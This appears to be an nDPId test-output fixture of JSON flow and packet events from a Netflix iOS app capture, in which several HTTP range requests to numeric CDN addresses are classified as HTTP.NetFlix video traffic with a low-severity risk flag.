-01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056204,"flow_last_seen":1484319056204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056204,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1484319056204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056204,"pkt":"gCqoTGHM5JjWH70UCABFAABAfy9AAEAG1l7AqAEHF\/YLhc+0AFDwxwoWAAAAALAC\/\/9XEAAAAgQFtAEDAwUBAQgKH2UQewAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056210,"flow_last_seen":1484319056210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056210,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1484319056210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056210,"pkt":"gCqoTGHM5JjWH70UCABFAABAc11AAEAG4jDAqAEHF\/YLhc+1AFCjZhjfAAAAALAC\/\/+VoQAAAgQFtAEDAwUBAQgKH2UQgQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1233,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056214,"flow_last_seen":1484319056214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056214,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1484319056214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056214,"pkt":"gCqoTGHM5JjWH70UCABFAABAlQtAAEAGwHrAqAEHF\/YLjc+2AFBDrGT6AAAAALAC\/\/+pMwAAAgQFtAEDAwUBAQgKH2UQhQAAAAAEAgAA"} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1484319056215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056215,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz7RnATKV8McKF6AS\/\/8JWwAAAgQFtAEDAwkEAggKNWmPpR9lEHs="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1484319056219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056219,"pkt":"gCqoTGHM5JjWH70UCABFAAA0oIhAAEAGtRHAqAEHF\/YLhc+0AFDwxwoXZwEyloAQEBUoBwAAAQEICh9lEIg1aY+l"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056221,"flow_last_seen":1484319056221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056221,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1484319056221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056221,"pkt":"gCqoTGHM5JjWH70UCABFAABAtyBAAEAGnmXAqAEHF\/YLjc+3AFC7qylgAAAAALAC\/\/9syQAAAgQFtAEDAwUBAQgKH2UQiQAAAAAEAgAA"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056232,"flow_last_seen":1484319056232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056232,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1484319056232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056232,"pkt":"gCqoTGHM5JjWH70UCABFAABA7BpAAEAGaWvAqAEHF\/YLjc+4AFBql8CVAAAAALAC\/\/8mpAAAAgQFtAEDAwUBAQgKH2UQjAAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1484319056233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056233,"pkt":"gCqoTGHM5JjWH70UCABFAABALEhAAEAGKT7AqAEHF\/YLjc+5AFBMFfUEAAAAALAC\/\/8QsgAAAgQFtAEDAwUBAQgKH2UQkAAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1484319056233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056233,"pkt":"gCqoTGHM5JjWH70UCABFAABACXBAAEAGTBbAqAEHF\/YLjc+6AFDVkM0AAAAAALAC\/\/+vNgAAAgQFtAEDAwUBAQgKH2UQkwAAAAAEAgAA"} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1484319056234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056234,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz7VYH\/mqo2YY4KAS\/\/\/lFwAAAgQFtAEDAwkEAggKL5BAHx9lEIE="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1484319056234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056234,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7YrOmTYQ6xk+6AS\/\/\/4+gAAAgQFtAEDAwkEAggKJ9gJPh9lEIU="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056234,"flow_last_seen":1484319056234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056234,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1484319056234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056234,"pkt":"gCqoTGHM5JjWH70UCABFAABATZFAAEAGB\/XAqAEHF\/YLjc+7AFDfu3VVAAAAALAC\/\/\/8sgAAAgQFtAEDAwUBAQgKH2UQlgAAAAAEAgAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1484319056235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056235,"pkt":"gCqoTGHM5JjWH70UCABFAAA09NVAAEAGYMTAqAEHF\/YLhc+1AFCjZhjgWB\/5q4AQEBUDvAAAAQEICh9lEJYvkEAf"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1484319056236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056236,"pkt":"gCqoTGHM5JjWH70UCABFAAA0j6xAAEAGxeXAqAEHF\/YLjc+2AFBDrGT7Kzpk2YAQEBUXoQAAAQEICh9lEJgn2Ak+"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1484319056237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056237,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7dWBL6lu6spYaAS\/\/\/t4QAAAgQFtAEDAwkEAggKuIfCpR9lEIk="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Xt9AAEAG9rLAqAEHF\/YLjc+3AFC7qylhVgS+poAQEBUMigAAAQEICh9lEJq4h8Kl"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056241,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAABAWzRAAEAG+lHAqAEHF\/YLjc+8AFAt4\/K3AAAAALAC\/\/8xJAAAAgQFtAEDAwUBAQgKH2UQmgAAAAAEAgAA"} 
-01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABAgCRAAEAG1WHAqAEHF\/YLjc+9AFCAerrsAAAAALAC\/\/8WUwAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABA6tRAAEAGarHAqAEHF\/YLjc++AFBtOQm6AAAAALAC\/\/\/axQAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7vga1YT37t1VqAS\/\/\/ATQAAAgQFtAEDAwkEAggKs1tjeh9lEJY="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7h\/u26MapfAlqAS\/\/8KPAAAAgQFtAEDAwkEAggKFFAqwB9lEIw="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7qJ1p961ZDNAaAS\/\/87aAAAAgQFtAEDAwkEAggKTYEN7B9lEJM="} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7nPaH08TBX1BaAS\/\/\/55gAAAgQFtAEDAwkEAggKNK+mZh9lEJA="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0QtJAAEAGEsDAqAEHF\/YLjc+7AFDfu3VW4GtWFIAQEBXe3gAAAQEICh9lEL6zW2N6"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gLJAAEAG1N\/AqAEHF\/YLjc+4AFBql8CWf7tujYAQEBUowwAAAQEICh9lEL4UUCrA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0s8BAAEAGodHAqAEHF\/YLjc+6AFDVkM0Bidafe4AQEBVZ9gAAAQEICh9lEL5NgQ3s"} 
